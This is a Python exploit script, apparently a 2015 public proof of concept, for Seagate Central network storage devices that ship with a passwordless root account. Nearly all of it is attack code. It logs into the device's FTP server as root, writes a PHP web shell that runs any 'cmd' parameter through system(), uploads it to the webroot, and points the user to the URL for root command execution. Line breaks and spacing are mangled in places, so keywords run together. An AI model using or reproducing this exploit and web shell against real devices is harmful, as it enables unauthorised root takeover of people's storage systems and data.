#!/usr/bin/python# seagate_ftp_remote_root.py## Seagate Central Remote Root Exploit## Jeremy Brown [jbrown3264/gmail]# May 2015## -Synopsis-## Seagate Central by default has a passwordless root account (and no option to change it).# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.# From there, we can execute commands with root privileges as lighttpd is also running as root.## -Fixes-## Seagate scheduled it's updates to go live on April 28th, 2015.## Tested Firmware Version: 2014.0410.0026-F#import sys
from ftplib import FTP
port =21
php_shell ="""
<?php
if(isset($_REQUEST['cmd']))
{
$cmd = ($_REQUEST["cmd"]);
echo "<pre>$cmd</pre>";
system($cmd);
}
?>
"""
php_shell_filename ="shell.php"
seagate_central_webroot ="/cirrus/"defmain():if(len(sys.argv)<2):print("Usage: %s <host>"% sys.argv[0])return
host = sys.argv[1]try:withopen(php_shell_filename,'w')asfile:file.write(php_shell)except Exception as error:print("Error: %s"% error);returntry:
ftp = FTP(host)
ftp.login("root")
ftp.storbinary("STOR "+ seagate_central_webroot + php_shell_filename,open(php_shell_filename,'rb'))
ftp.close()except Exception as error:print("Error: %s"% error);returnprint("Now surf on over to http://%s%s%s for the php root shell"%(host, seagate_central_webroot, php_shell_filename))returnif __name__ =="__main__":
main()
